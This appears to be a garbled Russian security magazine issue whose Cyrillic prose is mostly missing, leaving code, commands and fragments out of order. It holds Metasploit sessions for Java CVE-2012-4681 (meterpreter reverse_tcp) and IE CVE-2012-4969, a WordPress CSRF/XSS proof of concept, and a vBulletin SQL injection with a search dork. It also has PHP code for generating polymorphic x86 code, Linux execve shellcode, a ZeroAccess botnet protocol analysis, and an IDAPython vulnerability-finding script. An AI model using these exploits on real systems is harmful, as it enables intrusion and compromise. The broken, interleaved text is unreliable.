. , :).
!


(ivinside.blogspot.com)
(115612, . , . 1)

/
x86-
.


.
, ...
.
,
!

0-day Java SE
CVE-2012-4681

CVSSV2

10.0
(AV:N/AC:L/AU:N/C:C/I:C/A:C)

BRIEF

: 26 2012
: Michael Schierl, jduck, sinn3r, juan vazquez
CVE: CVE-2012-4681
,
JDK 7: ClassFinder MethodFinder.findMethod(). ClassFinder
classForName,
JDK 6.
JDK 7 ( sun.awt.SunToolkit).
sun.swt.SunToolkit public-
getField() ,
Statement.acc, AccessControlContext,
. ,
Java-.

,
, ,
java.security.AccessController.checkPermission
,
(, ,
doPrivileged).
,
java.security.AccessControlContext java.
security.ProtectionDomain, , AccessControlContext
java.beans.Statement,
.
java.beans.Statement
, AccessControlContext
, AccessController.getContext():

EXPLOIT

JDK . ,
java.security.AccessController.checkPermission, .
,
, .


CVE-2012-4681 Metasploit


public class Statement {

    private static Object[] emptyArray = new Object[]{};
    static ExceptionListener defaultExceptionListener = new ExceptionListener() {
        public void exceptionThrown(Exception e) {
            System.err.println(e);
            System.err.println("Continuing ...");
        }
    };
    private final AccessControlContext acc = AccessController.getContext();
    private final Object target;
    private final String methodName;
    private final Object[] arguments;
    ClassLoader loader;
    [...]
}

getContext() AccessControlContext
, .
, . ,
sun.awt.SunToolkit,
public-:
public static Field getField(final Class klass, final String fieldName) {
    return AccessController.doPrivileged(new PrivilegedAction<Field>() {
        public Field run() {
            try {
                Field field = klass.getDeclaredField(fieldName);
                assert (field != null);
                field.setAccessible(true);
                return field;
            } catch (SecurityException e) {
                assert false;
            } catch (NoSuchFieldException e) {
                assert false;
            }
            return null;
        }
    });
}

getField , , , .
, , , ,
, ,
. :
com.sun.deploy.*
com.sun.imageio.*
com.sun.javaws.*
com.sun.jnlp.*
com.sun.xml.internal.bind.*
com.sun.xml.internal.ws.*
sun.*




AccessControlException. , ,
.
java.beans.
Expression, java.beans.Statement.
Expression.execute Statement.invokeInternal. ,
Statement.invokeInternal com.sun.beans.
finder.ClassFinder.resolveClass,
com.sun.beans.finder.ClassFinder.findClass:
public static Class<?> resolveClass(String name, ClassLoader loader)
        throws ClassNotFoundException {
    Class<?> type = PrimitiveTypeMap.getType(name);
    return (type == null) ? findClass(name, loader) : type;
}

public static Class<?> findClass(String name) throws ClassNotFoundException {
    try {
        ClassLoader loader = Thread.currentThread().getContextClassLoader();
        if (loader == null) {
            loader = ClassLoader.getSystemClassLoader();
        }
        if (loader != null) {
            return Class.forName(name, false, loader);
        }
    } catch (ClassNotFoundException exception) {
        // use current class loader instead
    } catch (SecurityException exception) {
        // use current class loader instead
    }
    return Class.forName(name);
}

, , Class.forName,
. Class.forName
ClassLoader, JDK, ,
,
. ,
sun.awt.SunToolkit.
,

,
.
, .
Statement.invokeInternal, , com.sun.beans.finder.MethodFinder.findMethod:
public static Method findMethod(Class<?> type, String name, Class<?>... args)
        throws NoSuchMethodException {
    ...
    method = findAccessibleMethod(new MethodFinder(name, args).find(type.getMethods()));
    CACHE.put(signature, method);
    return method;
}

findAccessibleMethod java.lang.Class.getMethods.
com.sun.beans.finder.MethodFinder, JDK , , ,
.
, :
Statement,
System.setSecurityManager(null);
AccessControlContext ;
sun.awt.
SunToolkit;
public-
getFiled Statement.acc,

AccessControlContext;
Statement,
,
AccessControlContext .

Metasploit:
msf > use exploit/multi/browser/java_jre17_exec
msf exploit(java_jre17_exec) > set uripath exm
uripath => exm
msf exploit(java_jre17_exec) > set payload \
java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_jre17_exec) > set lhost 192.168.0.123
lhost => 192.168.0.123
msf exploit(java_jre17_exec) > show options
Module options (exploit/multi/browser/java_jre17_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     exm              no        The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.123    yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
       Generic (Java Payload)

msf exploit(java_jre17_exec) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.123:4444
[*] Using URL: http://0.0.0.0:8080/exm
[*] Local IP: http://192.168.0.123:8080/exm
[*] Server started.

http://192.168.0.123:8080/exm,
. .
TARGETS

Oracle JSE (Java Standard Edition) 1.7.0_06-b24 .


SOLUTION

, .

Meterpreter CVE-2012-4681


0-day use-after-free
execCommand IE

CVSSV2

9.3
(AV:N/AC:M/AU:N/C:C/I:C/A:C)

BRIEF

: 18 2012
: unknow, eromang, binjo, sinn3r, juan vazquez
CVE: CVE-2012-4969

in-the-wild 14 2012
, .
HTML-
CMshtmlEd, CMshtmlEd::Exec(),
use-after-free.

EXPLOIT

, IE .

Metasploit:
msf > use exploit/windows/browser/ie_execcommand_uaf
msf exploit(ie_execcommand_uaf) > set uripath exm
uripath => exm
msf exploit(ie_execcommand_uaf) > set target 5
target => 5
msf exploit(ie_execcommand_uaf) > set payload windows/exec
payload => windows/exec
msf exploit(ie_execcommand_uaf) > set cmd calc.exe
cmd => calc.exe
msf exploit(ie_execcommand_uaf) > show options

Module options (exploit/windows/browser/ie_execcommand_uaf):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     exm              no        The URI to use for this exploit (default is random)

Payload options (windows/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       calc.exe         yes       The command string to execute
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none

Exploit target:

   Id  Name
   --  ----
   5   IE 8 on Windows 7

msf exploit(ie_execcommand_uaf) > exploit
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8080/exm
[*] Local IP: http://192.168.0.123:8080/exm
[*] Server started.

http://192.168.0.123:8080/exm .

TARGETS

Microsoft Internet Explorer 69.

SOLUTION


WordPress WP-TopBar

CVSSV2

6.0
(AV:N/AC:M/Au:S/C:P/I:P/A:P)

BRIEF

: 13 2012
: Blake Entrekin
WP-TopBar CSRF ( ) stored (,
) XSS, ,
.
EXPLOIT

1. CSRF. wp-topbar.php ,
POST-,
CSRF. :
<html>
<head>
<title></title>
</head>
<body>
<form name="testform" action="https://localhost/ \
wordpress/wp-admin/admin.php?page=wp-topbar.php
&action=topbartext&barid=1" method="POST"> <br>
<input type="hidden" name="wptbbartext" value= \
"</script><script>onload=alert(3)</script>">
<input type="hidden" name="wptblinktext" \
value="whatever">
<input type="hidden" name="wptblinkurl" value= \
"http%3A%2F%2Fwordpress.org%2Fextend%2Fplugins%2
Fwp-topbar%2F">
<input type="hidden" name="wptblinktarget" \
value="blank">
<input type="hidden" name="wptbenableimage" \
value="false">
<input type="hidden" name="wptbbarimage" value="">
<input type="hidden" name="update_wptbSettings" \
value="Update+Settings">
</form>
<script type="text/javascript">


vBulletin over 100 000

document.testform.submit();
</script>
</body>
</html>

SQL- vBulletin Yet


Another Awards System

CVSSV2

6.0
(AV:N/AC:M/Au:S/C:P/I:P/A:P)


, wptbbartext
JS,
XSS.
2. XSS. Message (
wptbbartext) wp-topbar.php
Stored Cross-site Scripting.
. :

BRIEF

: 29 2012
: Backsl@sh/Dan
Google Dork: inurl:awards.php intext:"powered by vbulletin"
SQL- Yet Another Awards System
vBulletin SQL- .
EXPLOIT

</script><script>alert(3)</script>


<script>alert(3)</script> ,
.
TARGETS

WordPress WP-TopBar 4.02 , , .

/request_award.php:
$vbulletin->input->clean_array_gpc(p, array(
award_id => TYPE_UINT,
//award_request_name => TYPE_STR,
//award_request_recipient_name => TYPE_STR,
award_request_reason => TYPE_STR,
award_request_uid => TYPE_UNIT,
));

SOLUTION

4.03 .

SQL-
YET
ANOTHER AWARDS SYSTEM

VBULLETIN

SQL-

$award_request_uid = $vbulletin->GPC[award_request_uid];
$db->query_write("INSERT INTO " . TABLE_PREFIX . "award_ \
requests (award_req_uid, award_rec_uid, award_req_aid,
award_req_reason) VALUES ($award_request_uid,
$award_request_uid, $award[award_id],". $db->escape_ \
string($vbulletin->GPC[award_request_reason]) .")");

$award_request_uid . :
http://[site].com/request_award.php
POST: do=submit&name=award_id=[_ID]
&award_request_reason=0
&award_request_uid=0[SQL-]&submit=Submit
TARGETS

Yet Another Awards System 4.02 , , .


SOLUTION


Sanjar Satsura (satsura@r00tw0rm.com, twitter.com/!#/sanjar_satsura)

- ,
. ,
. ,
-
.
- ?
, . exploit pack, ,
,
, .
.
1. , ,
- .
(XSS, SQLi, CSRF, etc.), ,
, , .
2. 0-day /
, - Metasploit.
3. , JS,
.
, iframe, , - :).
4. PHP, , - ,
.


, ,
:). , ,
PHP. ,
, , , , .
,
, . ,
, .


(
, XOR),
, - .

. ,
MtE
. - ,

(), . ,
, , . ,
/, , , ,

, , /
.
, ,
.
, ,
, , , .
, ,
, . .
.
. , ,
,
. . ( )
. , .
.
,


,
.

,
.
:

, .
. , ,
(
), : , ()
().
PHP? ,
,
( ).
, ,
:).
-.
- PHP
Creama (, !).
32-
x86:

;
;
;
.


:
1.
function one_operand($number) {
$commands = array("bswap", "dec", "inc", "mul", "neg", \
"not");
$regs_32 = array("eax", "ecx", "edx", "ebx", "esi", \
"edi");
for($i=0; $i<$number; $i++) {
$count_c = rand(0, count($commands)-1);
$count_r = rand(0, count($regs_32)-1);
$makeup .= $commands[$count_c]." ". \
$regs_32[$count_r]. \ "\r\n";
}


echo $makeup;
}

2. - .
function trash_operand($number) {
$commands = array("adc", "add", "sub", "and", "cmp", \
"mov", "or", "test", "xor", "sbb");
$regs_32 = array("eax", "ecx", "edx", "ebx", "esi", \
"edi");
for($i=0; $i<$number; $i++) {
$count_c = rand(0, count($commands)-1);
$count_r = rand(0, count($regs_32)-1);
$count_r2 = rand(1, 99999999);
$makeup .= $commands[$count_c]. \
" ".$regs_32[$count_r].", ".$count_r2."\r\n";
}
echo $makeup;
}

(src/
chocotg.php).

!

- , ,
(, , ), .
, , ,

PHP. ,
(x86) PHP,
.
0.0.1 ,
.
8/16/32- , Jxx,
,
.
, ,
-
,
:
;
, VM;


LibTIFF PDF 18/43

VM-:
+ SHA-256

, ;
;
, .

PUSH_REG(ECX);
PUSH_REG(EBX);
MOV_REG(ESP,ECX);
INT('80');
POPA();
CALL_VARL('fffffff4');


. BlackLights
shellcode generator for Linux x86. :

return($result);
}

char code[] =
"\\x60"
"\\x31\\xc0"
"\\x31\\xd2"
"\\xb0\\x0b"
"\\x52"
"\\x68\\x6e\\x2f\\x73\\x68"
"\\x68\\x2f\\x2f\\x62\\x69"
"\\x89\\xe3"
"\\x52"
"\\x68\\x2d\\x63\\x63\\x63"
"\\x89\\xe1"
"\\x52"
"\\xeb\\x07"
"\\x51"
"\\x53"
"\\x89\\xe1"
"\\xcd\\x80"
"\\x61"
"\\xe8\\xf4\\xff\\xff\\xff"

/*pusha*/
/*xor
%eax,%eax*/
/*xor
%edx,%edx*/
/*mov
$0xb,%al*/
/*push
%edx*/
/*push
$0x68732f6e*/
/*push
$0x69622f2f*/
/*mov
%esp,%ebx*/
/*push
%edx*/
/*push
$0x6363632d*/
/*mov
%esp,%ecx*/
/*push
%edx*/
/*jmp
804839a <cmd>*/
/*push
%ecx*/
/*push
%ebx*/
/*mov
%esp,%ecx*/
/*int
$0x80*/
/*popa*/
/*call 8048393 <l1>*/;

linux_shellcodegen_null_free($result);

:
include(phpcodegen_lib.php),
linux_shellcodegen_null_free(), $result, ,
.
:
\x60\x31\xc0\x31\xd2\xb0\x52\x68\x6e\x2f\x73\x68\x68\x2f\
x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\
xe9\x9a\x83\x04\x08\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\
xff\xff\xff

, ,

, PHP , , .

X86
,
,
.
include('phpcodegen_lib.php');
function linux_shellcodegen_null_free(){
PUSHA();
XOR_REG(EAX, EAX);
XOR_REG(EDX, EDX);
MOV_B(AL,'0B');
PUSH_REG(EDX);
PUSH_L('68732f6e');
PUSH_L('69622f2f');
MOV_REG(ESP,EBX);
PUSH_REG(EDX);
PUSH_L('6363632d');
MOV_REG(ESP,ECX);
PUSH_REG(EDX);
JMP_L('0804839a');


- Creama.
,
:
32- ;
/
MASM (windows) ,
.
, ,
, .
phpcodegen. ( ) z0mbie:
process_randseed:

mov
imul
add

eax, randseed
eax, 214013
eax, 2531011


get_rnd_number:

__div:

__mul:

__exit:

mov
dec
jz
push
push
call
cmp
jb
xor
div
xchg
jmp
shr
imul
shr
pop
pop
retn

eax, randseed
randcount
__exit
ecx
edx
process_randseed
ecx, 65536 ;
__mul
;
edx, edx
;
ecx
; ECX
edx, eax
;
__exit
; >= 65536
eax, 16
eax, ecx
eax, 16
edx
ecx

PUSH_REG(EDX);
CALL $process_randseed;
CMP_L(ECX,65536);
JB($mul);
#__div:
XOR_REG(EDX, EDX);
DIV_REG(ECX)
XCHG(EDX, EAX);
JMP($exit);
#__mul:
SHR(EAX, 16);
IMUL(EAX, ECX);
SHR(EAX,16);
#__exit:
POP_REG(EDX);
POP_REG(ECX');
RETN();
}

:
, ,
, .

( ).

include('phpcodegen_lib.php');
function GRN($randseed, $randcount){
#process_randseed:
MOV_L(EAX,$randseed);
IMUL(EAX, 214013);
ADD_REG(EAX', 2531011);
MOV_REG(EAX, $randseed);
DEC_VARL($randcount);
JZ($exit);

,
, .
phpcodegen library
. , , ,

! vx! z

#get_rnd_number:
PUSH_REG(ECX);

WARNING

VM
LODSD();
PUSH_REG('EAX');
vm_fetch();

,
, , VM, .
:
class VM
{
public function __construct($data, $vc_va){
$this->_data=$data;
$this->_vcva=$vc_va;
}
public function vm_start($vc_va){
MOV_L('ESI', $vc_va);
}
public function vm_fetch(){
XOR_REG('EAX', 'EAX');
LOADSB();
PUSHA();
XOR_REG('ECX',ECX);
JMP_REG('EDI');
}
public function push_handler(){


}
public function call_handler(){
LODSD();
CALL_REG('EAX');
vm_fetch();
}
}
class VmCode
{
public static function virtualise($data, \
$vc_va=null)
{
return new VM($data,$vc_va);
}
}

, ,
,
SHA-256 :).


.
,


,

.

WWW
MS-REMa

: bit.ly/
OjneyJ;
z0mbie
,

: bit.
ly/OMxRd6, bit.
ly/RLk9rU, bit.ly/
R8WTBR;

PHP Codegen Library:
bit.ly/KASoye;



: vxarchiv.at;
EOF: eofproject.net.


(contact@netzob.org)

-


NETZOB

-
:
,
.
,
,
,
,
.

-
. , -
, ,
- - USB- .
,
- . .

, .
(
),
,
, :
, , .
, ,
.
.
, (NIDS) , ( ).


. 1. &C- SDBot. .

,
. ,
,
.

Netzob. ,
, .



,
. , ICMP
, ICMP ECHO REPLY
TYPE 8 ICMP ECHO REQUEST TYPE 8. , , TCP-.
,
,
(. . 2).
Netzob .

, -


Netzob .
, : , , . ,
TCP SYN ,
ICMP ECHO REQUEST SMTP EHLO .
,
(, TCP , ).
, .
( ). ,
, (, TCP, IP, Ethernet),
.
, .
: ,
.

. ,
,
.
( ,
, , , ), ,
(, , , ASCII, DER ). , ,
, IP-, URL . . 1 C&C- SDBot.


. 2. TCP

.

.

, (
) ( ).
,
:
1. ,
. ,
. ,
USB (, ) (, C&C- ),
.
2. : IP-, .
3. ,
.
. VMware
VirtualBox.
4. ,
. , , , API Hooking,
.


NETZOB
,
Netzob
. , . 3, .
1:

, Netzob .



, . .
,
.
.
2:
. ,
, . , ,
. 3.
. , Netzob

. ,
.
. ,
.

, . , .
3:

. ,

.

NETZOB
Netzob
30 000 , Python
C. git
Debian, Gentoo, Arch Linux Windows.
Netzob x86 x64
:
:
,
XML.
,
. Netzob
.
,
, .
, Netzob ,
, PCAP, (, ).
: Netzob.
:
,
.
,
-,
.
,
, . ,
.
.
, -


. 3. Netzob
192.168.42.41   76.179.7.70     UDP   58   Source port: 52483   Destination port: 16464
192.168.42.41   115.22.87.69    UDP   58   Source port: 52483   Destination port: 16464
192.168.42.41   66.231.52.69    UDP   58   Source port: 52483   Destination port: 16464
192.168.42.41   190.94.221.68   UDP   58   Source port: 52483   Destination port: 16464
192.168.42.41   98.252.214.26   UDP   58   Source port: 52483   Destination port: 16464

. 4. , Wireshark

. ,
. ,

.
:
,
.
, (Wireshark,
Scapy) (Peach, Sulley).


Netzob . ,
ZeroAccess P2P .
,
. IDS/
IPS --- , ,
. ,
, ,
100 . ,
, Netzob.
botnet .


ZEROACCESS P2P

. , malware,
Wireshark.
. 4 UDP,
(192.168.42.41) 16464 IP
(76.179.7.70, 115.22.87.69, ).
.
(58 )
. , UDP,
TCP
.


. 6.

. 5. ()

P2P, UDP 16464.


PCAP Netzob.

NETZOB
Netzob ,
, git-:
git clone https://dev.netzob.org/git/netzob.git/

setup.py:
python setup.py build
python setup.py develop

, Netzob:
./netzob


RE_ZeroAccess, PCAP UDP.
, .

,
.
,
, 47 .

. ,

. ,
. 70% :
, 33
.

.
,
, .
getL, . 7,
, . , .

retL getL. P2P, IP-
, IP retL
. , . IP, .
IP :
[IP1] xxxx [IP2] xxxx [IP3] xxxx


Netzob:
( , ),
(
, , ), , .

. . .
(. . 5) , ,
.


Netzob
,
(. . 6). ,


IP- .

Netzob,
. Netzob
, IP. :
yyyy [command] 000..000 [NbIP] [IP1] xxxx [IP2] xxxx \
[IP3] xxxxx ...

NETZOB

, . 8.
, Netzob,
. , ,
IP- .



F0     F1        F2     F3      F4
CRC    Command   0000   NbIPs   Aggregate (IP1, 0000)

. 7. getL

Field 1    Field 2   Field 3    Field 4
(.{,8})    getL      00000000   (.{,8})
hex        string    hex        hex
04eca70d   getL      00000000   f7d337d3
d039c13e   getL      00000000   e66a669a

. 8.

Netzob .
( , CRC, ).
, , ,
IP-, , ,
TCP. Netzob , IP-
( IP
Layer 4). , .

Netzob
. , , (getL retL).
,
getF, retF, srv

,
. .
.
, . Netzob

, TCP UDP.
,
. , ,
, VirtualBox, :

,
.
, ,
. ,
. , . 9 ,
ZeroAccess Bot,
udp://115.22.87.69:16464 .

,
. ( ,
), .
:
1. OpenChannelTransition: , . (ip_source, port_source,
ip_destination, port_destination) .
2. CloseChannelTransition: .
3. SemiStochasticTransition: , ( ) ,
. , getL retL.
, ,

getL/retL. 500
. ,

.

Netzob .

.
. ,
. Netzob
, .
! z
WARNING


. ,


,

.

#!/bin/sh
vboxName="TargetWindowsXP"
vboxId="ab922c7e-1c88-404a-a9fa-87fd9d4ff59e"
snapshotId="NetzobReady"
vboxmanage controlvm $vboxName poweroff
vboxmanage snapshot $vboxName restorecurrent
vboxmanage startvm $vboxName --type headless


, Netzob
.
,


. 9. ZeroAccess


Dharm (twitter.com/sky5earcher)




IDAPYTHON

WARNING


.
,


,

.

!

IDAPython. ,
,
Python, IDA Pro.

mov ax, [+4]


cmp , \
jz short loc_761AE698
sub edx, ecx
beginloop:
mov [ecx], ax
;
inc ecx
;
inc ecx
mov ax, [ecx+edx]
cmp ax, \
; \
jnz short beginloop

UNC- \\\\ . ( \\)


( \), -
. (
, )
, .
- ,
.
.

MS08-067:


,
.
-.
:
, .
.
(). inline memcpy, , .
.
.
: , ,
, .

.
( . . ) B, - (). , B .
, .

IDA Loop Detection, findloop Immunity
Debugger, Loop colorizer .
, .
.


RPC DCOM.
UNC.


begin_loop:
mov eax, dword ptr [ebx]
movzx ecx,word ptr [eax]
cmp ecx,5Ch
je out_of_loop
mov eax,dword ptr [ebx]
cmp eax,dword ptr [esi]
je out_of_loop
mov eax,dword ptr [ebx]
sub eax,2
mov dword ptr [ebx],eax
jmp begin_loop

; \
;

;
;
;

.
SAP NetWeaver (CVE-2012-2611):
begin_loop:
cmp edx,2


mov [ebp+DataEnd], TraceInfo


jnz copy_with_unicode_conversion ;
;
mov dx, TraceInfo
mov [ebp+eax*2+var_d],dx
;
jmp loop_end
copy_with_unicode_conversion:
movzx cx, byte ptr [TraceInfo]
mov [ebp+eax*2+var_d],cx ;
loop_end:
cmp [ebp+eax*2+var_d],0
;
;
jz out_of_loop

add eax,1
;
add TraceInfo,edx
jmp begin_loop


.
. .
, .
.
( ) ,
.
,
, . . . ,
.
XnView:
begin_loop:
xor ecx,ecx
mov edx,[edi]
mov cx,[ebp+e]
imul ecx,eax

;
;

mov [edx+eax*4],ecx
mov ecx,[edi+8]
inc eax
cmp eax,ecx
jl short begin_loop

. 1.

test esi, esi
jg short loc_5DEDED33
jmp short loc_5DEDED24
loc_5DEDED1E:
mov [edi], dx
inc esi
inc edi
inc edi
loc_5DEDED24:
inc dword ptr [ecx+8]
mov edx, [ecx+8]
cmp edx, [ecx+4]
jl short begin_loop

, ,
, false positives . ZERT (Zeroday Emergency Response Team) , [ecx+4],
(). Microsoft .
, :



. , .
. ?
, .
, +
.
.
Microsoft Vector Graphic rendering Engine
(CVE-2006-4868). :

begin_loop:
mov edx, [ecx+8]
mov ebx, [ecx]
mov dx, [ebx+edx*2]
test dx, dx                  ; compare with 0
jz short loc_5DEDED2F
cmp dx, 20h                  ; compare with 20h (space)
jnz short loc_5DEDED1E

, , esi ,
- .
jnb - . ZERT
.
. ,
:

cmp esi, 0FEh
jnb short skip_copy
mov [edi], dx
inc esi
inc edi
inc edi


cmp reg32, imm32

inc|add|sub|dec reg32

;
;

cmp reg32, imm32

cmp 0opnd, 1opnd


jump out_of_loop

;
; reg32
;

-:
Y ?.
inline memcpy,
.
false positive ( ) ,
, stosb/stosw/stosd, .
:
;
.

. .

.

:
1. ().
.
2. .
3. .
, .
.
4.1. .
4.2. .

,
.
. -.
, , ,
.
,
. , , . ,
.
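while addr!=startaddr:
    # code cross-references of the current instruction
    xref1=RfirstB(addr)
    xref2=Rnext(addr,0)
    # an instruction with a second reference that is neither a call
    # nor a jmp is recorded as a branch point
    if xref2!=0xffffffff and GetMnem(addr)!="call" and \
       GetMnem(addr)!="jmp":
        branchpoints.append(addr)
    # no further reference to follow: stop walking
    if xref1 == 0xffffffff:
        break
    addr=xref1
    # the instruction reached belongs to the loop body
    bodyaddr.append(addr)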


. 2. IDA

, ,
mov, 0- , 1-
(.: mov [eax],ecx).
( ) , 1-
(.: 0xBAADF00D
).
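for addr in bodyaddr:
    if GetMnem(addr)=="mov":
        # memory operand types:
        # 3 = base + index,
        # 4 = base + index + displacement
        memtypes=[3,4]
        if GetOpType(addr,0) in memtypes:
            # operand 1 is a register (operand type 1), e.g. mov [eax],ecx
            if GetOpType(addr,1)==1:
                # the loop body writes a register to memory
                return 1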

,
.
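# iterate over a copy, because entries are removed inside the loop
for addr in branchpoints[:]:
    # the two code references leaving the branch point
    xref1=Rfirst(addr)
    xref2=Rnext(addr,0)
    # follow the reference that leaves the loop body
    if xref1 in bodyaddr:
        flag=SearchBodyAddr(xref2)
    else:
        flag=SearchBodyAddr(xref1)
    if flag==1:
        # that path leads back into the body: not an exit condition
        branchpoints.remove(addr)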

jump-, ,
cmp, test.
,
-.
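# instructions that set the flags for a conditional jump
cmps=['cmp','test']
# at most five passes
for count in range(5):
    # walk backwards to the nearest cmp/test
    while GetMnem(addr) not in cmps:
        addr=RfirstB(addr)
    if GetMnem(addr)=="test":
        # test reg,reg is equivalent to cmp reg,0; with a single
        # branch point the loop ends on a value taken from the input
        if len(branchpoints)==1:
            print "input is exit condition!"
            vulncount+=1
            break
    # cmp whose operand 1 is not an immediate value (type 5)
    if GetMnem(addr)=="cmp" and GetOpType(addr,1)!=5:
        # trace where the compared register gets its value
        reg=GetOpnd(addr,0)
        TraceVal(reg,addr,iters)
        break
    # cmp against an immediate value
    if GetMnem(addr)=="cmp" and GetOpType(addr,1)==5:
        hardcoded=1
        # check the following instructions for a signed jump, j[gl]
        for count in range(5):
            addr=Rfirst(addr)
            if GetMnem(addr) in signjumps:
                vulncount+=1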

(). ,
,
.
cmp test.
,
, .
.
inc reg32
cmp reg32, imm32
jnb out_loop


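# instructions that can change a loop counter
iterlist=["inc","add","sub","dec"]
# addresses of candidate counter updates
iters=[]
# scan the loop body
for addr in bodyaddr:
    if GetMnem(addr) in iterlist:
        # remember the address of the update
        iters.append(addr)
return iters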



for addr in iters:
    reg=GetOpnd(addr,0)
    TraceVal(reg,endaddr)

-, call, eax.
xor, , ,
.
(


. 3. mshtml.dll

) , ,
.
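# instructions that may indicate a signed/unsigned mismatch
suspectedins=["movsx","sub","add"]
# instructions that copy a value into the traced register
movers=["mov","movzx"]
# memory operand types, e.g. [ebp+esi], [ebp+esi+8]
memtypes=[3,4]
# start address of the enclosing function
parent = GetFunctionAttr(addr,0)
# "and" so that the walk stops at the function start or at an invalid address
while addr != parent and addr!=0xffffffff:
    # reached the function prologue: stop
    if GetMnem(addr)=="push" and GetOpnd(addr,0)=="ebp":
        print "prolog"
        break
    # step to the previous instruction
    addr = RfirstB(addr)
    # operand 0 of the instruction is the traced register
    if GetOpnd(addr,0)==reg:
        # the value comes back from a call
        if GetMnem(addr)=="call" and reg=="eax":
            print reg,"returned by call"
            break
        # the register is set by xor
        if GetMnem(addr)=="xor":
            print reg,"xored"
            hardcoded=1
            break
        # arithmetic on the register outside the counter updates
        if GetMnem(addr) in suspectedins and addr \
           not in iters:
            print "suspected ins",reg,"at addr",hex(addr)
            vulncount+=1
        # the value is copied from elsewhere: from a register,
        # keep tracing that register; from memory, stop
        if GetMnem(addr) in movers:
            if GetOpType(addr,1)==1:
                reg=GetOpnd(addr,1)
            if GetOpType(addr,1) in memtypes:
                print reg,"from memory"
                break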

, .
. ,
. z


D1g1 , Digital Security (twitter.com/evdokimovds)

X-Tools

WARNING

.
,

,

.


Author: 0vercl0k
URL: https://github.com/0vercl0k/rp
System: Win/Linux/FreeBSD/Mac

Author: Peleus Uhley
URL: labs.adobe.com/technologies/swfinvestigator
System: Windows/Linux

Author: Parth Patel
URL: https://code.google.com/p/asef
System: Linux/Mac

ROP-

SWF

ANDROID


ROP-
(
- ). DEP (
2004 ), - .
ROP- DEP.
.
DEP, ASLR
.

ASLR,

ASLR ,

ROP-
, . JIT- .
, ROP-

rp++. ++
PE/ELF/
Mach-O x86/x64 ,

.
Intel AT&T
.

Adobe SWF Investigator GUI-,


,
SWF-
.
, .

Android Security Evaluation Framework (ASEF)


Android
.
,

.
APK-,
.
Android
Virtual Device
,
.
( , , )
. ASEF
, , ,
,
ASEF,
. :
;
;
;
;
API-


:
AS2/AS3 ;
SWF ;
SWF-;

SWF- (LSO- per site
).
:
SWF-;
SWF ;

Action
Message Format (AMF).
SWF Investigator
SWF- AMF-.

SWF-
AS3-.


Author: OUSPG
URL: code.google.com/p/ouspg
System: Linux/BSD/Mac

$ gzip -c /bin/bash > sample.gz


$ while true
do
radamsa sample.gz > fuzzed.gz
gzip -dc fuzzed.gz > /dev/null
test $? -gt 127 && break
done

TEST CASE
Radamsa
.

:
1) ;
2) ;
3) .
Radamsa
.
, / , , .
Radamsa
,
,

Author: Lavakumar Kuppan
URL: ironwasp.org
System: Windows

Author: Juuso Salonen
URL: https://github.com/juuso/keychaindump
System: Mac OS X

IronWASP
-.
Securitybyte 2011 .
GUI-,
,
#.


.
:
;
crawler;
proxy;

;
;

Python/Ruby;
JavaScript;
Ruby Python.

OS X /
keychain. :
: ,
Wi-Fi-, -,
.
Apple
, root keychain
( locked
keychain). ,
OS X, , .
.

OS X,

. - keychain
securityd
. 20 ,
wrapping ,

.


Author: Steven Seeley
URL: https://github.com/mrmee/heaper
System: Windows

ADVANCED SECURITY
TESTING PLATFORM


JSON, XML, Java .

, , CSRF, , ,

.

. Radamsa

, ,
,
.
,
ip:port. ,

tcpflow
Radamsa.

,
libxslt, Acrobat Reader, Mozilla
Firefox, Chrome, FFmpeg, Microsoft
Excel, libtiff, Webkit, Gzip
.

6
HEAP-HEAP-HEAPER
,
, , , ,
.
,
Immunity Debugger
heaper. :
PEB TEB;
;
calls/jmps, ;
, ,
, ,
, ;
/ FreeListInUse ;
;
;

.

, :
!heaper help <command>

heaper
WinXP,
Windows 7/8.


MALWARE

(stannic.man@gmail.com)

WINDOWS
,
ACL/DACL

,
Windows. ,
, ,
, ,
. ,

Windows
.

WARNING


.
,


,

.


, Windows . , , ,
.

*nix-like , Windows
(. 1)
, , .

Windows
. Windows
,
.
:
( ), ,
, .
Windows ,

,
. , , ,
: ,
, , , ,
, .
, () , , , ,
, ()
.
alarm- , , kernel-


Windows

. 2.

.1.

nt!ObOpenObjectByName.
. , , ,
.
, . , ,
nt!ObCheckObjectAccess nt!SeAccessCheck ( AccessCheck
). , ,
Windows (,
Se*-). ,
TRUE FALSE.
,
. , .

, .
Windows ,
,
.
SID
SID , .
,
,
.
,
. ,
. ,
. TOKEN (. 24). .


. , Windows , ( , ).
, , ,
, APC, DPC, .
,
.
,
OBJECT_HEADER. - .

Windows
SID ( ).
SID , Windows , ,
, . SID
,
, : S-1-5-21-1234567891012345678910-12345678910-1228.
, S-1-1-0 , . S-1-2-0 , , .
, ,
Windows. () , ,



WINDOWS.

()


MALWARE

. 3. WinDBG
CMD.EXE...

. 5. !

. 4. ...

, ,
.
, , (DACL).
,
. ACL
ACE. ACE SID , ACE : , ,
. ,
Active Directory.

?
, , -, . .
.
-, ,
. , ,
Windows , ,
.
2000-
Windows XP,

Local Service Local System.
